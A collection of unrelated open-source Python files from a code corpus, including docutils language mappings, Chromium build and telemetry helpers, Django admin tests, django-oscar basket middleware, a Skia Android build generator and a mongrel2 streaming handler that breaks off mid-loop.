'dedication': u'Dedicatoria',
'abstract': u'Abstract',
'attention': u'Atenci\u00f3n!',
'caution': u'Advertencia!',
'danger': u'PERIGO!',
'error': u'Erro',
'hint': u'Consello',
'important': u'Importante',
'note': u'Nota',
'tip': u'Suxesti\u00f3n',
'warning': u'Aviso',
'contents': u'Contido'}
"""Mapping of node class name to label text."""
bibliographic_fields = {
# language-dependent: fixed
u'autor': 'author',
u'autores': 'authors',
u'organizaci\u00f3n': 'organization',
u'enderezo': 'address',
u'contacto': 'contact',
u'versi\u00f3n': 'version',
u'revisi\u00f3n': 'revision',
u'estado': 'status',
u'data': 'date',
u'dereitos de copia': 'copyright',
u'dedicatoria': 'dedication',
u'abstract': 'abstract'}
"""Galician (lowcased) to canonical name mapping for bibliographic fields."""
author_separators = [';', ',']
"""List of separator strings for the 'Authors' bibliographic field. Tried in
order."""
|
zhangfangyan/devide
|
refs/heads/master
|
modules/vtk_basic/vtkSESAMEReader.py
|
7
|
# class generated by DeVIDE::createDeVIDEModuleFromVTKObject
from module_kits.vtk_kit.mixins import SimpleVTKClassModuleBase
import vtk
class vtkSESAMEReader(SimpleVTKClassModuleBase):
def __init__(self, module_manager):
SimpleVTKClassModuleBase.__init__(
self, module_manager,
vtk.vtkSESAMEReader(), 'Reading vtkSESAME.',
(), ('vtkSESAME',),
replaceDoc=True,
inputFunctions=None, outputFunctions=None)
|
Fireblend/chromium-crosswalk
|
refs/heads/master
|
testing/scripts/get_compile_targets.py
|
76
|
#!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import json
import os
import sys
import common
def main(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--output', required=True)
parser.add_argument('args', nargs=argparse.REMAINDER)
args = parser.parse_args(argv)
passthrough_args = args.args
if passthrough_args[0] == '--':
passthrough_args = passthrough_args[1:]
results = {}
for filename in os.listdir(common.SCRIPT_DIR):
if not filename.endswith('.py'):
continue
if filename in ('common.py', 'get_compile_targets.py'):
continue
with common.temporary_file() as tempfile_path:
rc = common.run_command(
[sys.executable, os.path.join(common.SCRIPT_DIR, filename)] +
passthrough_args +
[
'compile_targets',
'--output', tempfile_path
]
)
if rc != 0:
return rc
with open(tempfile_path) as f:
results[filename] = json.load(f)
with open(args.output, 'w') as f:
json.dump(results, f)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
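# Illustrative invocation sketch (added; not in the original file):
#
#     ./get_compile_targets.py --output /tmp/targets.json -- <script args>
#
# Any arguments after the optional '--' are forwarded verbatim to every sibling
# script in SCRIPT_DIR; each script is asked for its 'compile_targets', and the
# per-script lists are merged into a single JSON object written to --output.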
|
Cloud-Elasticity-Services/as-libcloud
|
refs/heads/trunk
|
docs/examples/loadbalancer/elb/create_load_balancer.py
|
51
|
from libcloud.loadbalancer.base import Member, Algorithm
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
ACCESS_ID = 'your access id'
SECRET_KEY = 'your secret key'
cls = get_driver(Provider.ELB)
driver = cls(key=ACCESS_ID, secret=SECRET_KEY)
print(driver.list_balancers())
# members associated with the load balancer
members = (Member(None, '192.168.88.1', 8000),
Member(None, '192.168.88.2', 8080))
new_balancer = driver.create_balancer(
name='MyLB',
algorithm=Algorithm.ROUND_ROBIN,
port=80,
protocol='http',
members=members)
print(new_balancer)
|
TeamEOS/external_chromium_org
|
refs/heads/lp5.0
|
tools/telemetry/telemetry/value/__init__.py
|
9
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
The Value hierarchy provides a way of representing the values measurements
produce such that they can be merged across runs, grouped by page, and output
to different targets.
The core Value concept provides the basic functionality:
- association with a page, may be none
- naming and units
- importance tracking [whether a value will show up on a waterfall or output
file by default]
- default conversion to scalar and string
- merging properties
A page may actually run a few times during a single telemetry session.
Downstream consumers of test results typically want to group these runs
together, then compute summary statistics across runs. Value provides the
Merge* family of methods for this kind of aggregation.
"""
# When combining a pair of Values together, it is sometimes ambiguous whether
# the values should be concatenated, or one should be picked as representative.
# The possible merging policies are listed here.
CONCATENATE = 'concatenate'
PICK_FIRST = 'pick-first'
# When converting a Value to its buildbot equivalent, the context in which the
# value is being interpreted actually affects the conversion. This is insane,
# but there you have it. There are three contexts in which Values are converted
# for use by buildbot, represented by these output-intent values.
PER_PAGE_RESULT_OUTPUT_CONTEXT = 'per-page-result-output-context'
COMPUTED_PER_PAGE_SUMMARY_OUTPUT_CONTEXT = 'merged-pages-result-output-context'
SUMMARY_RESULT_OUTPUT_CONTEXT = 'summary-result-output-context'
class Value(object):
"""An abstract value produced by a telemetry page test.
"""
def __init__(self, page, name, units, important):
"""A generic Value object.
Note: page may be given as None to indicate that the value represents
results from multiple pages.
"""
self.page = page
self.name = name
self.units = units
self.important = important
def IsMergableWith(self, that):
return (self.units == that.units and
type(self) == type(that) and
self.important == that.important)
@classmethod
def MergeLikeValuesFromSamePage(cls, values):
"""Combines the provided list of values into a single compound value.
When a page runs multiple times, it may produce multiple values. This
function is given the same-named values across the multiple runs, and has
the responsibility of producing a single result.
It must return a single Value. If merging does not make sense, the
implementation must pick a representative value from one of the runs.
For instance, it may be given
[ScalarValue(page, 'a', 1), ScalarValue(page, 'a', 2)]
and it might produce
ListOfScalarValues(page, 'a', [1, 2])
"""
raise NotImplementedError()
@classmethod
def MergeLikeValuesFromDifferentPages(cls, values,
group_by_name_suffix=False):
"""Combines the provided values into a single compound value.
When a full pageset runs, a single value_name will usually end up getting
collected for multiple pages. For instance, we may end up with
[ScalarValue(page1, 'a', 1),
ScalarValue(page2, 'a', 2)]
This function takes in the values of the same name, but across multiple
pages, and produces a single summary result value. In this instance, it
could produce a ScalarValue(None, 'a', 1.5) to indicate averaging, or even
ListOfScalarValues(None, 'a', [1, 2]) if concatenated output was desired.
Some results are so specific to a page that they make no sense when
aggregated across pages. If merging values of this type across pages is
non-sensical, this method may return None.
If group_by_name_suffix is True, then x.z and y.z are considered to be the
same value and are grouped together. If false, then x.z and y.z are
considered different.
"""
raise NotImplementedError()
def _IsImportantGivenOutputIntent(self, output_context):
if output_context == PER_PAGE_RESULT_OUTPUT_CONTEXT:
return False
elif output_context == COMPUTED_PER_PAGE_SUMMARY_OUTPUT_CONTEXT:
return self.important
elif output_context == SUMMARY_RESULT_OUTPUT_CONTEXT:
return self.important
def GetBuildbotDataType(self, output_context):
"""Returns the buildbot's equivalent data_type.
This should be one of the values accepted by perf_tests_results_helper.py.
"""
raise NotImplementedError()
def GetBuildbotValue(self):
"""Returns the buildbot's equivalent value."""
raise NotImplementedError()
def GetBuildbotMeasurementAndTraceNameForPerPageResult(self):
measurement, _ = _ConvertValueNameToBuildbotChartAndTraceName(self.name)
return measurement, self.page.display_name
@property
def name_suffix(self):
"""Returns the string after a . in the name, or the full name otherwise."""
if '.' in self.name:
return self.name.split('.', 1)[1]
else:
return self.name
def GetBuildbotMeasurementAndTraceNameForComputedSummaryResult(
self, trace_tag):
measurement, bb_trace_name = (
_ConvertValueNameToBuildbotChartAndTraceName(self.name))
if trace_tag:
return measurement, bb_trace_name + trace_tag
else:
return measurement, bb_trace_name
def GetRepresentativeNumber(self):
"""Gets a single scalar value that best-represents this value.
Returns None if not possible.
"""
raise NotImplementedError()
def GetRepresentativeString(self):
"""Gets a string value that best-represents this value.
Returns None if not possible.
"""
raise NotImplementedError()
def ValueNameFromTraceAndChartName(trace_name, chart_name=None):
"""Mangles a trace name plus optional chart name into a standard string.
A value might just be a bareword name, e.g. numPixels. In that case, its
chart may be None.
But, a value might also be intended for display with other values, in which
case the chart name indicates that grouping. So, you might have
screen.numPixels, screen.resolution, where chartName='screen'.
"""
assert trace_name != 'url', 'The name url cannot be used'
if chart_name:
return '%s.%s' % (chart_name, trace_name)
else:
assert '.' not in trace_name, ('Trace names cannot contain "." with an '
'empty chart_name since this is used to delimit chart_name.trace_name.')
return trace_name
def _ConvertValueNameToBuildbotChartAndTraceName(value_name):
"""Converts a value_name into the buildbot equivalent name pair.
Buildbot represents values by the measurement name and an optional trace name,
whereas telemetry represents values with a chart_name.trace_name convention,
where chart_name is optional.
This converts from the telemetry convention to the buildbot convention,
returning a 2-tuple (measurement_name, trace_name).
"""
if '.' in value_name:
return value_name.split('.', 1)
else:
return value_name, value_name
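# Illustrative examples (not part of the original module) of how the two
# naming helpers above behave, given the chart_name.trace_name convention:
#
#   ValueNameFromTraceAndChartName('numPixels', 'screen')
#     -> 'screen.numPixels'
#   ValueNameFromTraceAndChartName('numPixels')
#     -> 'numPixels'
#   _ConvertValueNameToBuildbotChartAndTraceName('screen.numPixels')
#     -> ['screen', 'numPixels']        (str.split result)
#   _ConvertValueNameToBuildbotChartAndTraceName('numPixels')
#     -> ('numPixels', 'numPixels')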
|
MFoster/breeze
|
refs/heads/master
|
tests/regressiontests/admin_util/tests.py
|
44
|
from __future__ import absolute_import, unicode_literals
from datetime import datetime
from django.conf import settings
from django.contrib import admin
from django.contrib.admin import helpers
from django.contrib.admin.util import (display_for_field, label_for_field,
lookup_field, NestedObjects)
from django.contrib.admin.views.main import EMPTY_CHANGELIST_VALUE
from django.contrib.sites.models import Site
from django.db import models, DEFAULT_DB_ALIAS
from django import forms
from django.test import TestCase
from django.utils import unittest
from django.utils.formats import localize
from django.utils.safestring import mark_safe
from django.utils import six
from .models import Article, Count, Event, Location, EventGuide
class NestedObjectsTests(TestCase):
"""
Tests for ``NestedObject`` utility collection.
"""
def setUp(self):
self.n = NestedObjects(using=DEFAULT_DB_ALIAS)
self.objs = [Count.objects.create(num=i) for i in range(5)]
def _check(self, target):
self.assertEqual(self.n.nested(lambda obj: obj.num), target)
def _connect(self, i, j):
self.objs[i].parent = self.objs[j]
self.objs[i].save()
def _collect(self, *indices):
self.n.collect([self.objs[i] for i in indices])
def test_unrelated_roots(self):
self._connect(2, 1)
self._collect(0)
self._collect(1)
self._check([0, 1, [2]])
def test_siblings(self):
self._connect(1, 0)
self._connect(2, 0)
self._collect(0)
self._check([0, [1, 2]])
def test_non_added_parent(self):
self._connect(0, 1)
self._collect(0)
self._check([0])
def test_cyclic(self):
self._connect(0, 2)
self._connect(1, 0)
self._connect(2, 1)
self._collect(0)
self._check([0, [1, [2]]])
def test_queries(self):
self._connect(1, 0)
self._connect(2, 0)
# 1 query to fetch all children of 0 (1 and 2)
# 1 query to fetch all children of 1 and 2 (none)
# Should not require additional queries to populate the nested graph.
self.assertNumQueries(2, self._collect, 0)
def test_on_delete_do_nothing(self):
"""
Check that the nested collector doesn't query for DO_NOTHING objects.
"""
n = NestedObjects(using=DEFAULT_DB_ALIAS)
objs = [Event.objects.create()]
EventGuide.objects.create(event=objs[0])
with self.assertNumQueries(2):
# One for Location, one for Guest, and no query for EventGuide
n.collect(objs)
class UtilTests(unittest.TestCase):
def test_values_from_lookup_field(self):
"""
Regression test for #12654: lookup_field
"""
SITE_NAME = 'example.com'
TITLE_TEXT = 'Some title'
CREATED_DATE = datetime.min
ADMIN_METHOD = 'admin method'
SIMPLE_FUNCTION = 'function'
INSTANCE_ATTRIBUTE = 'attr'
class MockModelAdmin(object):
def get_admin_value(self, obj):
return ADMIN_METHOD
simple_function = lambda obj: SIMPLE_FUNCTION
article = Article(
site=Site(domain=SITE_NAME),
title=TITLE_TEXT,
created=CREATED_DATE,
)
article.non_field = INSTANCE_ATTRIBUTE
verifications = (
('site', SITE_NAME),
('created', localize(CREATED_DATE)),
('title', TITLE_TEXT),
('get_admin_value', ADMIN_METHOD),
(simple_function, SIMPLE_FUNCTION),
('test_from_model', article.test_from_model()),
('non_field', INSTANCE_ATTRIBUTE)
)
mock_admin = MockModelAdmin()
for name, value in verifications:
field, attr, resolved_value = lookup_field(name, article, mock_admin)
if field is not None:
resolved_value = display_for_field(resolved_value, field)
self.assertEqual(value, resolved_value)
def test_null_display_for_field(self):
"""
Regression test for #12550: display_for_field should handle None
value.
"""
display_value = display_for_field(None, models.CharField())
self.assertEqual(display_value, EMPTY_CHANGELIST_VALUE)
display_value = display_for_field(None, models.CharField(
choices=(
(None, "test_none"),
)
))
self.assertEqual(display_value, "test_none")
display_value = display_for_field(None, models.DateField())
self.assertEqual(display_value, EMPTY_CHANGELIST_VALUE)
display_value = display_for_field(None, models.TimeField())
self.assertEqual(display_value, EMPTY_CHANGELIST_VALUE)
# Regression test for #13071: NullBooleanField has special
# handling.
display_value = display_for_field(None, models.NullBooleanField())
expected = '<img src="%sadmin/img/icon-unknown.gif" alt="None" />' % settings.STATIC_URL
self.assertEqual(display_value, expected)
display_value = display_for_field(None, models.DecimalField())
self.assertEqual(display_value, EMPTY_CHANGELIST_VALUE)
display_value = display_for_field(None, models.FloatField())
self.assertEqual(display_value, EMPTY_CHANGELIST_VALUE)
def test_label_for_field(self):
"""
Tests for label_for_field
"""
self.assertEqual(
label_for_field("title", Article),
"title"
)
self.assertEqual(
label_for_field("title2", Article),
"another name"
)
self.assertEqual(
label_for_field("title2", Article, return_attr=True),
("another name", None)
)
self.assertEqual(
label_for_field("__unicode__", Article),
"article"
)
self.assertEqual(
label_for_field("__str__", Article),
str("article")
)
self.assertRaises(
AttributeError,
lambda: label_for_field("unknown", Article)
)
def test_callable(obj):
return "nothing"
self.assertEqual(
label_for_field(test_callable, Article),
"Test callable"
)
self.assertEqual(
label_for_field(test_callable, Article, return_attr=True),
("Test callable", test_callable)
)
self.assertEqual(
label_for_field("test_from_model", Article),
"Test from model"
)
self.assertEqual(
label_for_field("test_from_model", Article, return_attr=True),
("Test from model", Article.test_from_model)
)
self.assertEqual(
label_for_field("test_from_model_with_override", Article),
"not What you Expect"
)
self.assertEqual(
label_for_field(lambda x: "nothing", Article),
"--"
)
class MockModelAdmin(object):
def test_from_model(self, obj):
return "nothing"
test_from_model.short_description = "not Really the Model"
self.assertEqual(
label_for_field("test_from_model", Article, model_admin=MockModelAdmin),
"not Really the Model"
)
self.assertEqual(
label_for_field("test_from_model", Article,
model_admin = MockModelAdmin,
return_attr = True
),
("not Really the Model", MockModelAdmin.test_from_model)
)
def test_related_name(self):
"""
Regression test for #13963
"""
self.assertEqual(
label_for_field('location', Event, return_attr=True),
('location', None),
)
self.assertEqual(
label_for_field('event', Location, return_attr=True),
('awesome event', None),
)
self.assertEqual(
label_for_field('guest', Event, return_attr=True),
('awesome guest', None),
)
def test_logentry_unicode(self):
"""
Regression test for #15661
"""
log_entry = admin.models.LogEntry()
log_entry.action_flag = admin.models.ADDITION
self.assertTrue(
six.text_type(log_entry).startswith('Added ')
)
log_entry.action_flag = admin.models.CHANGE
self.assertTrue(
six.text_type(log_entry).startswith('Changed ')
)
log_entry.action_flag = admin.models.DELETION
self.assertTrue(
six.text_type(log_entry).startswith('Deleted ')
)
# Make sure custom action_flags works
log_entry.action_flag = 4
self.assertEqual(six.text_type(log_entry), 'LogEntry Object')
def test_safestring_in_field_label(self):
# safestring should not be escaped
class MyForm(forms.Form):
text = forms.CharField(label=mark_safe('<i>text</i>'))
cb = forms.BooleanField(label=mark_safe('<i>cb</i>'))
form = MyForm()
self.assertEqual(helpers.AdminField(form, 'text', is_first=False).label_tag(),
'<label for="id_text" class="required inline"><i>text</i>:</label>')
self.assertEqual(helpers.AdminField(form, 'cb', is_first=False).label_tag(),
'<label for="id_cb" class="vCheckboxLabel required inline"><i>cb</i></label>')
        # normal strings need to be escaped
class MyForm(forms.Form):
text = forms.CharField(label='&text')
cb = forms.BooleanField(label='&cb')
form = MyForm()
self.assertEqual(helpers.AdminField(form, 'text', is_first=False).label_tag(),
'<label for="id_text" class="required inline">&text:</label>')
self.assertEqual(helpers.AdminField(form, 'cb', is_first=False).label_tag(),
'<label for="id_cb" class="vCheckboxLabel required inline">&cb</label>')
|
nzavagli/UnrealPy
|
refs/heads/master
|
UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/django-1.8.2/tests/gis_tests/distapp/models.py
|
31
|
from django.contrib.gis.db import models
from django.utils.encoding import python_2_unicode_compatible
from ..utils import gisfield_may_be_null
@python_2_unicode_compatible
class NamedModel(models.Model):
name = models.CharField(max_length=30)
objects = models.GeoManager()
class Meta:
abstract = True
def __str__(self):
return self.name
class SouthTexasCity(NamedModel):
"City model on projected coordinate system for South Texas."
point = models.PointField(srid=32140)
class SouthTexasCityFt(NamedModel):
"Same City model as above, but U.S. survey feet are the units."
point = models.PointField(srid=2278)
class AustraliaCity(NamedModel):
"City model for Australia, using WGS84."
point = models.PointField()
class CensusZipcode(NamedModel):
"Model for a few South Texas ZIP codes (in original Census NAD83)."
poly = models.PolygonField(srid=4269)
class SouthTexasZipcode(NamedModel):
"Model for a few South Texas ZIP codes."
poly = models.PolygonField(srid=32140, null=gisfield_may_be_null)
class Interstate(NamedModel):
"Geodetic model for U.S. Interstates."
path = models.LineStringField()
class SouthTexasInterstate(NamedModel):
"Projected model for South Texas Interstates."
path = models.LineStringField(srid=32140)
|
geekboxzone/lollipop_external_skia
|
refs/heads/geekbox
|
platform_tools/android/bin/gyp_to_android.py
|
66
|
#!/usr/bin/python
# Copyright 2014 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Script for generating the Android framework's version of Skia from gyp
files.
"""
import os
import shutil
import sys
import tempfile
# Find the top of trunk
SCRIPT_DIR = os.path.abspath(os.path.dirname(__file__))
SKIA_DIR = os.path.normpath(os.path.join(SCRIPT_DIR, os.pardir, os.pardir,
os.pardir))
# Find the directory with our helper files, and add it to the path.
ANDROID_TOOLS = os.path.join(SKIA_DIR, 'platform_tools', 'android')
sys.path.append(ANDROID_TOOLS)
import gyp_gen.android_framework_gyp as android_framework_gyp
import gyp_gen.gypd_parser as gypd_parser
import gyp_gen.generate_user_config as generate_user_config
import gyp_gen.makefile_writer as makefile_writer
import gyp_gen.tool_makefile_writer as tool_makefile_writer
import gyp_gen.vars_dict_lib as vars_dict_lib
# Folder containing all gyp files and generated gypd files.
GYP_FOLDER = 'gyp'
def generate_var_dict(target_dir, target_file, skia_arch_type, have_neon):
"""Create a VarsDict for a particular arch type.
  Each parameter is passed directly to android_framework_gyp.main().
Args:
target_dir: Directory containing gyp files.
target_file: Target gyp file.
skia_arch_type: Target architecture.
have_neon: Whether the target should build for neon.
Returns:
A VarsDict containing the variable definitions determined by gyp.
"""
result_file = android_framework_gyp.main(target_dir, target_file,
skia_arch_type, have_neon)
var_dict = vars_dict_lib.VarsDict()
gypd_parser.parse_gypd(var_dict, result_file, '.')
android_framework_gyp.clean_gypd_files(target_dir)
print '.',
return var_dict
def main(target_dir=None, require_sk_user_config=False):
"""Create Android.mk for the Android framework's external/skia.
Builds Android.mk using Skia's gyp files.
Args:
target_dir: Directory in which to place 'Android.mk'. If None, the file
will be placed in skia's root directory.
require_sk_user_config: If True, raise an AssertionError if
SkUserConfig.h does not exist.
"""
# Create a temporary folder to hold gyp and gypd files. Create it in SKIA_DIR
# so that it is a sibling of gyp/, so the relationships between gyp files and
# other files (e.g. platform_tools/android/gyp/dependencies.gypi, referenced
  # by android_deps.gyp as a relative path) are unchanged.
# Use mkdtemp to find an unused folder name, but then delete it so copytree
# can be called with a non-existent directory.
tmp_folder = tempfile.mkdtemp(dir=SKIA_DIR)
os.rmdir(tmp_folder)
shutil.copytree(os.path.join(SKIA_DIR, GYP_FOLDER), tmp_folder)
try:
main_gyp_file = 'android_framework_lib.gyp'
print 'Creating Android.mk',
# Generate a separate VarsDict for each architecture type. For each
# archtype:
# 1. call android_framework_gyp.main() to generate gypd files
# 2. call parse_gypd to read those gypd files into the VarsDict
# 3. delete the gypd files
#
# Once we have the VarsDict for each architecture type, we combine them all
# into a single Android.mk file, which can build targets of any
# architecture type.
    # The default uses a non-existent arch type, to find all the general
# variable definitions.
default_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'other',
False)
arm_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'arm', False)
arm_neon_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'arm',
True)
x86_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'x86', False)
mips_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'mips', False)
mips64_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'mips64',
False)
arm64_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'arm64',
False)
# Compute the intersection of all targets. All the files in the intersection
# should be part of the makefile always. Each dict will now contain trimmed
# lists containing only variable definitions specific to that configuration.
var_dict_list = [default_var_dict, arm_var_dict, arm_neon_var_dict,
x86_var_dict, mips_var_dict, mips64_var_dict,
arm64_var_dict]
common = vars_dict_lib.intersect(var_dict_list)
common.LOCAL_MODULE.add('libskia')
# Create SkUserConfig
user_config = os.path.join(SKIA_DIR, 'include', 'config', 'SkUserConfig.h')
if target_dir:
dst_dir = target_dir
else:
dst_dir = os.path.join(SKIA_DIR, 'include', 'core')
generate_user_config.generate_user_config(
original_sk_user_config=user_config,
require_sk_user_config=require_sk_user_config, target_dir=dst_dir,
ordered_set=common.DEFINES)
tool_makefile_writer.generate_tool(gyp_dir=tmp_folder,
target_file='tests.gyp',
skia_trunk=target_dir,
dest_dir='tests',
skia_lib_var_dict=common,
local_module_name='skia_test',
local_module_tags=['tests'])
tool_makefile_writer.generate_tool(gyp_dir=tmp_folder,
target_file='bench.gyp',
skia_trunk=target_dir,
dest_dir='bench',
skia_lib_var_dict=common,
local_module_name='skia_bench',
local_module_tags=['tests'],
place_in_local_tmp=True)
tool_makefile_writer.generate_tool(gyp_dir=tmp_folder,
target_file='gm.gyp',
skia_trunk=target_dir,
dest_dir='gm',
skia_lib_var_dict=common,
local_module_name='skia_gm',
local_module_tags=['tests'])
tool_makefile_writer.generate_tool(gyp_dir=tmp_folder,
target_file='dm.gyp',
skia_trunk=target_dir,
dest_dir='dm',
skia_lib_var_dict=common,
local_module_name='skia_dm',
local_module_tags=['tests'])
# Now that the defines have been written to SkUserConfig and they've been
# used to skip adding them to the tools makefiles, they are not needed in
# Android.mk. Reset DEFINES.
common.DEFINES.reset()
# Further trim arm_neon_var_dict with arm_var_dict. After this call,
# arm_var_dict (which will now be the intersection) includes all definitions
# used by both arm and arm + neon, and arm_neon_var_dict will only contain
# those specific to arm + neon.
arm_var_dict = vars_dict_lib.intersect([arm_var_dict, arm_neon_var_dict])
# Now create a list of VarsDictData holding everything but common.
deviations_from_common = []
deviations_from_common.append(makefile_writer.VarsDictData(
arm_var_dict, 'arm'))
deviations_from_common.append(makefile_writer.VarsDictData(
arm_neon_var_dict, 'arm', 'ARCH_ARM_HAVE_NEON'))
deviations_from_common.append(makefile_writer.VarsDictData(x86_var_dict,
'x86'))
# Currently, x86_64 is identical to x86
deviations_from_common.append(makefile_writer.VarsDictData(x86_var_dict,
'x86_64'))
deviations_from_common.append(makefile_writer.VarsDictData(mips_var_dict,
'mips'))
deviations_from_common.append(makefile_writer.VarsDictData(mips64_var_dict,
'mips64'))
deviations_from_common.append(makefile_writer.VarsDictData(arm64_var_dict,
'arm64'))
makefile_writer.write_android_mk(target_dir=target_dir,
common=common, deviations_from_common=deviations_from_common)
finally:
shutil.rmtree(tmp_folder)
if __name__ == '__main__':
main()
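# Usage sketch (an assumption, not taken from Skia documentation): run from a
# Skia checkout to (re)generate Android.mk in the tree root, e.g.
#
#   python platform_tools/android/bin/gyp_to_android.py
#
# main() can also be imported and called with target_dir pointing at an
# Android framework external/skia checkout.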
|
spartonia/django-oscar
|
refs/heads/master
|
src/oscar/apps/basket/middleware.py
|
15
|
from django.conf import settings
from django.contrib import messages
from django.core.signing import BadSignature, Signer
from django.utils.functional import SimpleLazyObject, empty
from django.utils.translation import ugettext_lazy as _
from oscar.core.loading import get_class, get_model
Applicator = get_class('offer.utils', 'Applicator')
Basket = get_model('basket', 'basket')
Selector = get_class('partner.strategy', 'Selector')
selector = Selector()
class BasketMiddleware(object):
# Middleware interface methods
def process_request(self, request):
# Keep track of cookies that need to be deleted (which can only be done
# when we're processing the response instance).
request.cookies_to_delete = []
# Load stock/price strategy and assign to request (it will later be
# assigned to the basket too).
strategy = selector.strategy(request=request, user=request.user)
request.strategy = strategy
# We lazily load the basket so use a private variable to hold the
# cached instance.
request._basket_cache = None
def load_full_basket():
"""
Return the basket after applying offers.
"""
basket = self.get_basket(request)
basket.strategy = request.strategy
self.apply_offers_to_basket(request, basket)
return basket
def load_basket_hash():
"""
Load the basket and return the basket hash
Note that we don't apply offers or check that every line has a
stockrecord here.
"""
basket = self.get_basket(request)
if basket.id:
return self.get_basket_hash(basket.id)
# Use Django's SimpleLazyObject to only perform the loading work
# when the attribute is accessed.
request.basket = SimpleLazyObject(load_full_basket)
request.basket_hash = SimpleLazyObject(load_basket_hash)
def process_response(self, request, response):
# Delete any surplus cookies
cookies_to_delete = getattr(request, 'cookies_to_delete', [])
for cookie_key in cookies_to_delete:
response.delete_cookie(cookie_key)
if not hasattr(request, 'basket'):
return response
# If the basket was never initialized we can safely return
if (isinstance(request.basket, SimpleLazyObject)
and request.basket._wrapped is empty):
return response
cookie_key = self.get_cookie_key(request)
        # Check if we need to set a cookie. If the cookie is already available
# but is set in the cookies_to_delete list then we need to re-set it.
has_basket_cookie = (
cookie_key in request.COOKIES
and cookie_key not in cookies_to_delete)
# If a basket has had products added to it, but the user is anonymous
# then we need to assign it to a cookie
if (request.basket.id and not request.user.is_authenticated()
and not has_basket_cookie):
cookie = self.get_basket_hash(request.basket.id)
response.set_cookie(
cookie_key, cookie,
max_age=settings.OSCAR_BASKET_COOKIE_LIFETIME,
secure=settings.OSCAR_BASKET_COOKIE_SECURE, httponly=True)
return response
def get_cookie_key(self, request):
"""
Returns the cookie name to use for storing a cookie basket.
The method serves as a useful hook in multi-site scenarios where
different baskets might be needed.
"""
return settings.OSCAR_BASKET_COOKIE_OPEN
def process_template_response(self, request, response):
if hasattr(response, 'context_data'):
if response.context_data is None:
response.context_data = {}
if 'basket' not in response.context_data:
response.context_data['basket'] = request.basket
else:
# Occasionally, a view will want to pass an alternative basket
# to be rendered. This can happen as part of checkout
# processes where the submitted basket is frozen when the
# customer is redirected to another site (eg PayPal). When the
# customer returns and we want to show the order preview
# template, we need to ensure that the frozen basket gets
# rendered (not request.basket). We still keep a reference to
# the request basket (just in case).
response.context_data['request_basket'] = request.basket
return response
# Helper methods
def get_basket(self, request):
"""
Return the open basket for this request
"""
if request._basket_cache is not None:
return request._basket_cache
num_baskets_merged = 0
manager = Basket.open
cookie_key = self.get_cookie_key(request)
cookie_basket = self.get_cookie_basket(cookie_key, request, manager)
if hasattr(request, 'user') and request.user.is_authenticated():
# Signed-in user: if they have a cookie basket too, it means
# that they have just signed in and we need to merge their cookie
# basket into their user basket, then delete the cookie.
try:
basket, __ = manager.get_or_create(owner=request.user)
except Basket.MultipleObjectsReturned:
# Not sure quite how we end up here with multiple baskets.
# We merge them and create a fresh one
old_baskets = list(manager.filter(owner=request.user))
basket = old_baskets[0]
for other_basket in old_baskets[1:]:
self.merge_baskets(basket, other_basket)
num_baskets_merged += 1
# Assign user onto basket to prevent further SQL queries when
# basket.owner is accessed.
basket.owner = request.user
if cookie_basket:
self.merge_baskets(basket, cookie_basket)
num_baskets_merged += 1
request.cookies_to_delete.append(cookie_key)
elif cookie_basket:
# Anonymous user with a basket tied to the cookie
basket = cookie_basket
else:
# Anonymous user with no basket - instantiate a new basket
# instance. No need to save yet.
basket = Basket()
        # Cache the basket instance for the duration of this request
request._basket_cache = basket
if num_baskets_merged > 0:
messages.add_message(request, messages.WARNING,
_("We have merged a basket from a previous session. Its contents "
"might have changed."))
return basket
def merge_baskets(self, master, slave):
"""
Merge one basket into another.
This is its own method to allow it to be overridden
"""
master.merge(slave, add_quantities=False)
def get_cookie_basket(self, cookie_key, request, manager):
"""
Looks for a basket which is referenced by a cookie.
If a cookie key is found with no matching basket, then we add
it to the list to be deleted.
"""
basket = None
if cookie_key in request.COOKIES:
basket_hash = request.COOKIES[cookie_key]
try:
basket_id = Signer().unsign(basket_hash)
basket = Basket.objects.get(pk=basket_id, owner=None,
status=Basket.OPEN)
except (BadSignature, Basket.DoesNotExist):
request.cookies_to_delete.append(cookie_key)
return basket
def apply_offers_to_basket(self, request, basket):
if not basket.is_empty:
Applicator().apply(basket, request.user, request)
def get_basket_hash(self, basket_id):
return Signer().sign(basket_id)
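# Illustrative sketch (not Oscar's own documentation): the basket hash stored
# in the cookie is simply the basket id signed with Django's Signer, so the
# round trip used by get_basket_hash()/get_cookie_basket() behaves like:
#
#   from django.core.signing import Signer, BadSignature
#   signer = Signer()
#   basket_hash = signer.sign(42)       # e.g. '42:1a2b3c...'
#   signer.unsign(basket_hash)          # -> '42'
#
# A tampered or stale hash raises BadSignature, which get_cookie_basket()
# treats as "no cookie basket" and schedules the cookie for deletion.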
|
rajive/mongrel2
|
refs/heads/master
|
examples/mp3stream/handler.py
|
98
|
from mp3stream import ConnectState, Streamer
from mongrel2 import handler
import glob
sender_id = "9703b4dd-227a-45c4-b7a1-ef62d97962b2"
CONN = handler.Connection(sender_id, "tcp://127.0.0.1:9995",
"tcp://127.0.0.1:9994")
STREAM_NAME = "Mongrel2 Radio"
MP3_FILES = glob.glob("*.mp3")
print "PLAYING:", MP3_FILES
CHUNK_SIZE = 8 * 1024
STATE = ConnectState()
STREAMER = Streamer(MP3_FILES, STATE, CONN, CHUNK_SIZE, sender_id)
STREAMER.start()
HEADERS = { 'icy-metaint': CHUNK_SIZE,
'icy-name': STREAM_NAME}
while True:
req = CONN.recv()
if req.is_disconnect():
print "DISCONNECT", req.headers, req.body, req.conn_id
STATE.remove(req)
else:
print "REQUEST", req.headers, req.body
if STATE.count() > 20:
print "TOO MANY", STATE.count()
